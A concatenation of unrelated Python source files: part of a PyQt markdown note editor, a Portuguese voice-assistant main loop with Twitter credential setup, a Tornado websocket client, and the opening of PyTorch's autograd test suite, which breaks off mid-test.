if self.speller and text:
if not self.speller.check(text):
lastAction = popup_menu.actions()[0]
for word in self.speller.suggest(text)[:10]:
action = QAction(word, popup_menu)
action.triggered.connect(correctWord(cursor, word))
action.setFont(QFont("sans", weight=QFont.Bold))
popup_menu.insertAction(lastAction, action)
popup_menu.insertSeparator(lastAction)
popup_menu.exec_(event.globalPos())
def keyPressEvent(self, event):
""" for Qt.Key_Tab, expand as 4 spaces
for other keys, use default implementation
"""
if event.key() == Qt.Key_Tab:
self.insertPlainText(' ')
else:
QTextEdit.keyPressEvent(self, event)
def save(self, item):
pageName = self.parent.notesTree.itemToPage(item)
filePath = self.parent.notesTree.itemToFile(item)
htmlFile = self.parent.notesTree.itemToHtmlFile(item)
fh = QFile(filePath)
try:
if not fh.open(QIODevice.WriteOnly):
raise IOError(fh.errorString())
except IOError as e:
QMessageBox.warning(self, 'Save Error',
'Failed to save %s: %s' % (pageName, e))
raise
finally:
if fh is not None:
savestream = QTextStream(fh)
savestream << self.toPlainText()
fh.close()
self.document().setModified(False)
# Fork a process to update index, which benefit responsiveness.
Process(target=self.updateIndex).start()
def toHtml(self):
'''markdown.Markdown.convert v.s. markdown.markdown
Previously `convert` was used, but it doens't work with fenced_code
'''
htmltext = self.toPlainText()
return markdown.markdown(htmltext, self.settings.extensions)
# md = markdown.Markdown(extensions)
# return md.convert(htmltext)
def saveAsHtml(self, htmlFile = None):
""" Save as Complete (with css and images) or HTML Only
To be merged with saveNoteAs
"""
if not htmlFile:
(htmlFile, htmlType) = QFileDialog.getSaveFileNameAndFilter(
self, self.tr("Export to HTML"), "", "Complete;;HTML Only")
if htmlFile == '':
return
if not QFileInfo(htmlFile).suffix():
htmlFile += '.html'
if htmlType == "Complete":
self.saveCompleteHtml(htmlFile)
else:
self.saveHtmlOnly(htmlFile)
def saveCompleteHtml(self, htmlFile):
html = QFile(htmlFile)
html.open(QIODevice.WriteOnly)
savestream = QTextStream(html)
css = QFile(self.settings.cssfile)
css.open(QIODevice.ReadOnly)
# Use a html lib may be a better idea?
savestream << "<html><head><meta charset='utf-8'></head>"
# Css is inlined.
savestream << "<style>"
savestream << QTextStream(css).readAll()
savestream << "</style>"
# Note content
savestream << self.toHtml()
savestream << "</html>"
html.close()
def saveHtmlOnly(self, htmlFile):
fileDir = os.path.dirname(htmlFile)
QDir().mkpath(fileDir)
html = QFile(htmlFile)
html.open(QIODevice.WriteOnly)
savestream = QTextStream(html)
savestream << """
<html><head>
<meta charset="utf-8">
<link rel="stylesheet" href="/css/notebook.css" type="text/css" />
</head>
"""
# Note content
savestream << self.toHtml()
savestream << "</html>"
html.close()
|
main.py | import json
from listener import Listener
from reproducer import reproduce
from unidecode import unidecode
from register_commands import get_current_manager
from commands import *
from Gui import Gui
from speech_recognition import UnknownValueError
import Twitter
import threading
listener = Listener()
manager = get_current_manager()
activator = "jarbas"
def run(wait_for_jarbas=True):
response = ""
while wait_for_jarbas:
try:
response = unidecode(listener.listen().lower())
except UnknownValueError:
print("Não falou jarbas.")
interface.setUserSpeech(response)
continue
if activator in response:
print(f"Falou jarbas.")
interface.setUserSpeech(response)
interface.mic_on()
break
print("Não falou jarbas.")
repeat_text = "Fala comigo." if wait_for_jarbas else "Por favor, tente novamente."
while True:
try:
reproduce(repeat_text)
response = unidecode(listener.listen().lower())
except UnknownValueError:
interface.setJarbasSpeech(f"Desculpe, não entendi.")
reproduce("Desculpe, não entendi.")
repeat_text = "Por favor, tente novamente."
print("Erro de reconhecimento.")
continue
interface.setUserSpeech(response)
break
wait_next_time = True
try:
command, text = manager.find_matching_command_and_text(response)
command_audio_response = command().run(text)
char_list = [command_audio_response[j]
for j in range(len(command_audio_response)) if ord(command_audio_response[j]) in range(65536)]
command_audio_response = ''
for j in char_list:
command_audio_response = command_audio_response+j
interface.setJarbasSpeech(command_audio_response)
reproduce(command_audio_response)
interface.mic_off()
except LookupError:
interface.setJarbasSpeech("Desculpe, não entendi.")
reproduce("Desculpe, não entendi.")
wait_next_time = False
except Exception as e:
print(e)
interface.setJarbasSpeech("Ocorreu um erro inesperado.")
reproduce("Ocorreu um erro inesperado.")
wait_next_time = False
return wait_next_time
def listening_loop():
should_wait_for_jarbas = True
while state["running"]:
should_wait_for_jarbas = run(should_wait_for_jarbas)
if __name__ == "__main__":
state = {
'running': True
}
def sendCallback(consumer_key, consumer_secret, key, secret):
with open("creds.json", 'w') as creds:
creds.write(json.dumps({
"consumer_key": consumer_key,
"consumer_secret": consumer_secret,
"key": key,
"secret": secret
}))
Twitter.my_twitter.set_api(consumer_key, consumer_secret, key, secret)
creds = {}
with open("creds.json", 'r') as creds_file:
try:
creds = json.load(creds_file)
except:
pass
if creds:
Twitter.my_twitter.set_api(**creds)
interface = Gui(sendCallback, creds)
listen_thread = threading.Thread(target=listening_loop)
listen_thread.start()
interface.mainloop()
state['running'] = False
listen_thread.join()
|
socketClient.py |
from tornado import escape
from tornado import gen
from tornado import httpclient
from tornado import httputil
from tornado import ioloop
from tornado import websocket
from collections import deque
import threading
import json
APPLICATION_JSON = 'application/json'
DEFAULT_CONNECT_TIMEOUT = 60
DEFAULT_REQUEST_TIMEOUT = 60
class WebSocketClient(object):
def __init__(self,*, connect_timeout=DEFAULT_CONNECT_TIMEOUT,
request_timeout=DEFAULT_REQUEST_TIMEOUT):
self.connect_timeout = connect_timeout
self.request_timeout = request_timeout
def connect(self, url):
"""Connect to the server.
:param str url: server URL.
"""
self._ioloop = ioloop.IOLoop()
headers = httputil.HTTPHeaders({'Content-Type': APPLICATION_JSON})
request = httpclient.HTTPRequest(url=url,
connect_timeout=self.connect_timeout,
request_timeout=self.request_timeout,
headers=headers)
self.ws_conn = websocket.WebSocketClientConnection(self._ioloop,
request)
self._ioloop.add_future(self.ws_conn.connect_future, self._connect_callback)
def _connect_callback(self, future):
if future.exception() is None:
self._ws_connection = future.result()
self._on_connection_success()
self._read_messages()
else:
self._on_connection_error(future.exception())
def send(self, data):
if not self._ws_connection:
raise RuntimeError('Web socket connection is closed.')
self._ws_connection.write_message(escape.utf8(json.dumps(data)))
def close(self, future):
"""Close connection.
"""
if not self._ws_connection:
raise RuntimeError('Web socket connection is already closed.')
self._ws_connection.close()
@gen.coroutine
def _read_messages(self):
while True:
msg = yield self._ws_connection.read_message()
if msg is None:
self._on_connection_close()
break
self._on_message(msg)
def _on_message(self, msg):
"""This is called when new message is available from the server.
:param str msg: server message.
"""
def _on_connection_success(self):
"""This is called on successful connection ot the server.
"""
pass
def _on_connection_close(self):
"""This is called when server closed the connection.
"""
pass
def _on_connection_error(self, exception):
"""This is called in case if connection to the server could
not established.
"""
pass
class UsefulWebSocket1(WebSocketClient):
def __init__(self, url):
self.url = url
self.data_deque = deque()
super(UsefulWebSocket1, self).__init__()
def connect(self):
super(UsefulWebSocket1, self).connect(self.url)
self._ioloop_thread = threading.Thread(target=self._run_ioloop)
self._ioloop_thread.start()
def send(self, data):
self.data_deque.append(data)
self._ioloop.add_future(self.ws_conn.connect_future, self._send)
def _send(self, future):
super(UsefulWebSocket1, self).send(self.data_deque.popleft())
def _run_ioloop(self):
self._ioloop.start()
def _stop_ioloop(self, future):
self._ioloop.add_callback(self._ioloop.stop)
def close_(self):
self._ioloop.add_future(self.ws_conn.connect_future, super(UsefulWebSocket1, self).close)
self._ioloop.add_future(self.ws_conn.connect_future, self._stop_ioloop)
def _on_connection_close(self):
self.close_()
print('Connection Closed')
def _on_connection_success(self):
print('Connection Open')
def _on_connection_error(self, exception):
print('Connection closed due to: ', exception)
class UsefulWebSocket(object):
def __init__(self, url, receiver):
self.url = url
self.receiver = receiver
def send(self, data):
print(data)
ws = UsefulWebSocket1(self.url)
ws.connect()
ws.send({'receiver': self.receiver, 'algorithm': self.algorithm, 'method': data})
def resend(self, data):
ws = UsefulWebSocket1(self.url)
ws.connect()
ws.send(data)
class SocketModel3D(UsefulWebSocket):
def __init__(self, url):
super(SocketModel3D, self).__init__(url, 'model3D')
class SocketCFD(UsefulWebSocket):
def __init__(self, url):
super(SocketCFD, self).__init__(url, 'CFD')
class SocketDesign(UsefulWebSocket):
def __init__(self, url):
super(SocketDesign, self).__init__(url, 'design')
class SocketHandler(UsefulWebSocket):
def __init__(self, url):
super(SocketHandler, self).__init__(url, 'handler')
|
test_autograd.py | import contextlib
import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing import randn_like
from torch.testing._internal.common_methods_invocations import (method_tests,
create_input, unpack_variables,
EXCLUDE_FUNCTIONAL, EXCLUDE_GRADCHECK,
EXCLUDE_GRADGRADCHECK,
EXCLUDE_GRADGRADCHECK_BY_TEST_NAME,
exclude_tensor_method,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf)
_END_SENTINEL = object()
def getattr_qualified(obj, qname, default=None):
""" Like getattr but works with qualified names
e.g. getattr(torch, 'fft.rfft')
"""
path = qname.split('.')
for name in path:
obj = getattr(obj, name, _END_SENTINEL)
if obj is _END_SENTINEL:
return default
return obj
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
@contextlib.contextmanager
def backward_engine(engine):
_prev_engine = Variable._execution_engine
Variable._execution_engine = engine()
try:
yield
finally:
Variable._execution_engine = _prev_engine
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
